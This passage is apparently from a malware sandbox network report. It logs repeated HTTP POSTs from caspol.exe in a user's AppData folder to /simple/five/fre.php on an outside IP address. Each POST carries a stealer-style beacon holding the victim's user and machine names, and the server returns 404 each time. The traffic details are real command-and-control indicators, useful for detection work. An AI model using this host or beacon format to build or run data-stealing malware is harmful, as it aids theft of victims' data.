Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:25.322678089 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.22 | 49196 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:25.460459948 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:25.465375900 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:26.325515985 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:26 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.22 | 49197 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:26.469594002 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:26.474558115 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:27.207211971 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.22 | 49198 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:27.348721027 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:27.353741884 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:28.068264961 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.22 | 49199 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:28.247658014 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:28.253668070 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:28.977535009 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.22 | 49200 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:29.120889902 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:29.125787973 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:29.974338055 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.22 | 49201 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:30.109941006 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:30.114919901 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:30.837785006 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:30 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.22 | 49202 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:30.986397028 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:30.992768049 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:31.706429005 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.22 | 49203 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:32.058171988 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:32.063041925 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:32.783813000 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.22 | 49204 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:32.920535088 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:32.925554991 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:33.768088102 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.22 | 49205 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:33.900855064 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.41
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A6A8C306
    Content-Length: 149
    Connection: close
Nov 20, 2024 07:57:33.906029940 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:34.636761904 CET | 193 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Wed, 20 Nov 2024 06:57:34 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.22 | 49206 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:34.782082081 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.41
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A6A8C306
    Content-Length: 149
    Connection: close
Nov 20, 2024 07:57:34.787024021 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:35.506217003 CET | 193 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Wed, 20 Nov 2024 06:57:35 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.22 | 49207 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:35.650070906 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.41
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A6A8C306
    Content-Length: 149
    Connection: close
Nov 20, 2024 07:57:35.655030012 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:36.384850025 CET | 193 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Wed, 20 Nov 2024 06:57:36 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.22 | 49208 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:36.525110006 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.41
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A6A8C306
    Content-Length: 149
    Connection: close
Nov 20, 2024 07:57:36.530040979 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:37.243896008 CET | 193 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Wed, 20 Nov 2024 06:57:37 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.22 | 49209 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:37.380793095 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.41
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A6A8C306
    Content-Length: 149
    Connection: close
Nov 20, 2024 07:57:37.385968924 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:38.095659018 CET | 193 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Wed, 20 Nov 2024 06:57:37 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.22 | 49210 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:38.240227938 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.41
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A6A8C306
    Content-Length: 149
    Connection: close
Nov 20, 2024 07:57:38.245541096 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:38.955806971 CET | 193 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Wed, 20 Nov 2024 06:57:38 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.22 | 49211 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:39.095318079 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.41
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A6A8C306
    Content-Length: 149
    Connection: close
Nov 20, 2024 07:57:39.100303888 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:39.954087973 CET | 193 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Wed, 20 Nov 2024 06:57:39 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.22 | 49212 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:40.094630957 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.41
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A6A8C306
    Content-Length: 149
    Connection: close
Nov 20, 2024 07:57:40.099524021 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:40.816035032 CET | 193 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Wed, 20 Nov 2024 06:57:40 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.22 | 49213 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:40.952683926 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.41
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A6A8C306
    Content-Length: 149
    Connection: close
Nov 20, 2024 07:57:40.957521915 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:41.675704002 CET | 193 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Wed, 20 Nov 2024 06:57:41 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.22 | 49214 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:41.828788042 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.41
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A6A8C306
    Content-Length: 149
    Connection: close
Nov 20, 2024 07:57:41.834156990 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:42.543483973 CET | 193 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Wed, 20 Nov 2024 06:57:42 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.22 | 49215 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:42.685653925 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.41
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A6A8C306
    Content-Length: 149
    Connection: close
Nov 20, 2024 07:57:42.690841913 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:43.544902086 CET | 193 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Wed, 20 Nov 2024 06:57:43 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.22 | 49216 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe

Timestamp | Bytes transferred | Direction | Data
